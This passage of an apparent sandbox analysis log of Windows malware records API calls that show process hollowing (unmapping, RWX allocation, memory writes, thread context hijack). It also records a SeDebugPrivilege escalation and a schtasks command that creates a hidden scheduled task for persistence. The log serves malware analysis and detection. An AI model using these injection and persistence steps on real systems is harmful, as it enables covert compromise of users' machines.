[145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0225.058] ReadProcessMemory (in: hProcess=0x378, lpBaseAddress=0x2a4008, lpBuffer=0x19d654, nSize=0x4, lpNumberOfBytesRead=0x19d6a4 | out: lpBuffer=0x19d654*, lpNumberOfBytesRead=0x19d6a4*=0x4) returned 1
[0225.080] NtUnmapViewOfSection (ProcessHandle=0x378, BaseAddress=0x400000) returned 0x0
[0225.095] VirtualAllocEx (hProcess=0x378, lpAddress=0x400000, dwSize=0x17000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0225.106] WriteProcessMemory (in: hProcess=0x378, lpBaseAddress=0x400000, lpBuffer=0x32ed858*, nSize=0x1000, lpNumberOfBytesWritten=0x19d6a4 | out: lpBuffer=0x32ed858*, lpNumberOfBytesWritten=0x19d6a4*=0x1000) returned 1
[0225.117] WriteProcessMemory (in: hProcess=0x378, lpBaseAddress=0x401000, lpBuffer=0x22d8d0c*, nSize=0xf000, lpNumberOfBytesWritten=0x19d6a4 | out: lpBuffer=0x22d8d0c*, lpNumberOfBytesWritten=0x19d6a4*=0xf000) returned 1
[0225.124] WriteProcessMemory (in: hProcess=0x378, lpBaseAddress=0x410000, lpBuffer=0x22e7d18*, nSize=0x5000, lpNumberOfBytesWritten=0x19d6a4 | out: lpBuffer=0x22e7d18*, lpNumberOfBytesWritten=0x19d6a4*=0x5000) returned 1
[0225.129] WriteProcessMemory (in: hProcess=0x378, lpBaseAddress=0x415000, lpBuffer=0x22ecd24*, nSize=0x1000, lpNumberOfBytesWritten=0x19d6a4 | out: lpBuffer=0x22ecd24*, lpNumberOfBytesWritten=0x19d6a4*=0x1000) returned 1
[0225.133] WriteProcessMemory (in: hProcess=0x378, lpBaseAddress=0x416000, lpBuffer=0x22edd30*, nSize=0x1000, lpNumberOfBytesWritten=0x19d6a4 | out: lpBuffer=0x22edd30*, lpNumberOfBytesWritten=0x19d6a4*=0x1000) returned 1
[0225.142] WriteProcessMemory (in: hProcess=0x378, lpBaseAddress=0x2a4008, lpBuffer=0x22eed3c*, nSize=0x4, lpNumberOfBytesWritten=0x19d6a4 | out: lpBuffer=0x22eed3c*, lpNumberOfBytesWritten=0x19d6a4*=0x4) returned 1
[0225.145] SetThreadContext (hThread=0x458, lpContext=0x22ae858*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x2a4000, Edx=0x0, Ecx=0x0, Eax=0x40fd88, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0225.151] ResumeThread (hThread=0x458) returned 0x1
[0225.303] CoGetContextToken (in: pToken=0x19df90 | out: pToken=0x19df90) returned 0x0
[0225.303] CObjectContext::QueryInterface () returned 0x0
[0225.303] CObjectContext::GetCurrentThreadType () returned 0x0
[0225.303] Release () returned 0x3
[0225.304] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x13880, cHandles=0x1, pHandles=0x8183e8*=0x14c, lpdwindex=0x19de34 | out: lpdwindex=0x19de34) returned 0x0
Thread:
id = 2
os_tid = 0x13b4
Thread:
id = 3
os_tid = 0x13c4
Thread:
id = 4
os_tid = 0x13c8
[0134.131] CoGetContextToken (in: pToken=0x430fc74 | out: pToken=0x430fc74) returned 0x800401f0
[0134.131] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0134.131] RoInitialize () returned 0x1
[0134.131] RoUninitialize () returned 0x0
[0225.316] SetWindowLongW (hWnd=0x8023a, nIndex=-4, dwNewLong=1944586208) returned 79431142
[0225.317] SetClassLongW (hWnd=0x8023a, nIndex=-24, dwNewLong=1944586208) returned 0x4bc05be
[0225.318] PostMessageW (hWnd=0x8023a, Msg=0x10, wParam=0x0, lParam=0x0) returned 1
[0225.319] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0225.319] UnregisterClassW (lpClassName="WindowsForms10.Window.8.app.0.1ca0192_r10_ad1", hInstance=0x400000) returned 0
[0225.320] EtwEventUnregister (RegHandle=0x847538) returned 0x0
[0225.325] IsWindow (hWnd=0x203da) returned 1
[0225.327] GetModuleHandleW (lpModuleName="user32.dll") returned 0x743d0000
[0225.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x430fa14, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcWhmFR¤(ú o\x98ü0\x04\x01", lpUsedDefaultChar=0x0) returned 14
[0225.327] GetProcAddress (hModule=0x743d0000, lpProcName="DefWindowProcW") returned 0x73e807e0
[0225.328] SetWindowLongW (hWnd=0x203da, nIndex=-4, dwNewLong=1944586208) returned 79431302
[0225.328] SetClassLongW (hWnd=0x203da, nIndex=-24, dwNewLong=1944586208) returned 0x4bc0686
[0225.328] IsWindow (hWnd=0x203da) returned 1
[0225.329] DestroyWindow (hWnd=0x203da) returned 0
[0225.329] PostMessageW (hWnd=0x203da, Msg=0x10, wParam=0x0, lParam=0x0) returned 1
[0225.329] SetConsoleCtrlHandler (HandlerRoutine=0x4bc065e, Add=0) returned 1
[0225.360] GdipDeleteFont (font=0x5cdafd0) returned 0x0
[0225.360] GdipDeleteFont (font=0x5cdafa8) returned 0x0
[0225.361] GdipDeleteFont (font=0x5cdaf80) returned 0x0
[0225.361] GdipDeleteFont (font=0x5cdaf58) returned 0x0
[0225.361] GdipDeleteFont (font=0x5cdaf30) returned 0x0
[0225.361] GdipDeleteFont (font=0x4921f08) returned 0x0
[0225.364] GdipDisposeImage (image=0x5cdf268) returned 0x0
[0225.371] GdipDeleteFont (font=0x5cdb070) returned 0x0
[0225.371] GdipDeleteFont (font=0x5cdb048) returned 0x0
[0225.372] GdipDeleteFont (font=0x5cdb020) returned 0x0
[0225.373] DestroyCursor (hCursor=0xa0153) returned 1
[0225.374] RestoreDC (hdc=0x2b010970, nSavedDC=-1) returned 1
[0225.376] DeleteDC (hdc=0x2b010970) returned 1
[0225.376] DeleteObject (ho=0x270a0685) returned 1
[0225.377] GdipDeleteFont (font=0x492efc0) returned 0x0
[0225.379] GdipDeleteFont (font=0x5cdaff8) returned 0x0
[0225.380] CloseHandle (hObject=0x27c) returned 1
[0225.392] CloseHandle (hObject=0x384) returned 1
[0225.392] CloseHandle (hObject=0x390) returned 1
[0225.393] CloseHandle (hObject=0x4c8) returned 1
[0225.393] CloseHandle (hObject=0x380) returned 1
[0225.394] RegCloseKey (hKey=0x80000004) returned 0x0
Thread:
id = 5
os_tid = 0xac4
Thread:
id = 6
os_tid = 0x1030
Thread:
id = 7
os_tid = 0xc98
Thread:
id = 8
os_tid = 0xc74
[0204.777] CoGetContextToken (in: pToken=0x7bcfd0c | out: pToken=0x7bcfd0c) returned 0x0
[0204.777] CObjectContext::QueryInterface () returned 0x0
[0204.777] CObjectContext::GetCurrentThreadType () returned 0x0
[0204.777] Release () returned 0x0
Thread:
id = 9
os_tid = 0xc08
Thread:
id = 10
os_tid = 0x62c
Thread:
id = 11
os_tid = 0xb0c
Thread:
id = 96
os_tid = 0x1070
[0225.232] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0225.232] RoInitialize () returned 0x1
[0225.232] RoUninitialize () returned 0x0
[0225.262] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x7bcf15c | out: lpLuid=0x7bcf15c*(LowPart=0x14, HighPart=0)) returned 1
[0225.265] GetCurrentProcess () returned 0xffffffff
[0225.265] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x7bcf158 | out: TokenHandle=0x7bcf158*=0x4b4) returned 1
[0225.266] AdjustTokenPrivileges (in: TokenHandle=0x4b4, DisableAllPrivileges=0, NewState=0x22eee80*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0225.266] CloseHandle (hObject=0x4b4) returned 1
[0225.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x33b08b8, Length=0x20000, ResultLength=0x7bcf840 | out: SystemInformation=0x33b08b8, ResultLength=0x7bcf840*=0x14e40) returned 0x0
Thread:
id = 97
os_tid = 0xba4
Process:
id = "2"
image_name = "schtasks.exe"
filename = "c:\\windows\\syswow64\\schtasks.exe"
page_root = "0x54026000"
os_pid = "0x3b8"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0x1390"
cmd_line = "\"C:\\Windows\\System32\\schtasks.exe\" /Create /TN \"Updates\\ohnfNTVBamkg\" /XML \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp\""
cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 674
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 675
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 676
start_va = 0x40000
end_va = 0x54fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 677
start_va = 0x60000
end_va = 0x9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 678
start_va = 0xa0000
end_va = 0xdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000a0000"
filename = ""
Region:
id = 679
start_va = 0xe0000
end_va = 0xe3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 680
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 681
start_va = 0x100000
end_va = 0x101fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 682
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 683
start_va = 0xb60000
end_va = 0xb91fff
monitored = 1
entry_point = 0xb805b0
region_type = mapped_file
name = "schtasks.exe"
filename = "\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")
Region:
id = 684
start_va = 0xba0000
end_va = 0x4b9ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ba0000"
filename = ""
Region:
id = 685
start_va = 0x771d0000
end_va = 0x7734afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 686
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 687
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 688
start_va = 0x7fff0000
end_va = 0x7dfa1676ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 689
start_va = 0x7dfa16770000
end_va = 0x7ffa1676ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007dfa16770000"
filename = ""
Region:
id = 690
start_va = 0x7ffa16770000
end_va = 0x7ffa16930fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 691
start_va = 0x7ffa16931000
end_va = 0x7ffffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00007ffa16931000"
filename = ""
Region:
id = 692
start_va = 0x110000
end_va = 0x18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 693
start_va = 0x640d0000
end_va = 0x6411ffff
monitored = 0
entry_point = 0x640e8180
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 694
start_va = 0x64050000
end_va = 0x640c9fff
monitored = 0
entry_point = 0x64063290
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 695
start_va = 0x76720000
end_va = 0x767fffff
monitored = 0
entry_point = 0x76733980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 696
start_va = 0x64120000
end_va = 0x64127fff
monitored = 0
entry_point = 0x641217c0
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 697
start_va = 0x400000
end_va = 0x54ffff
monitored = 1
entry_point = 0x0
region_type = private
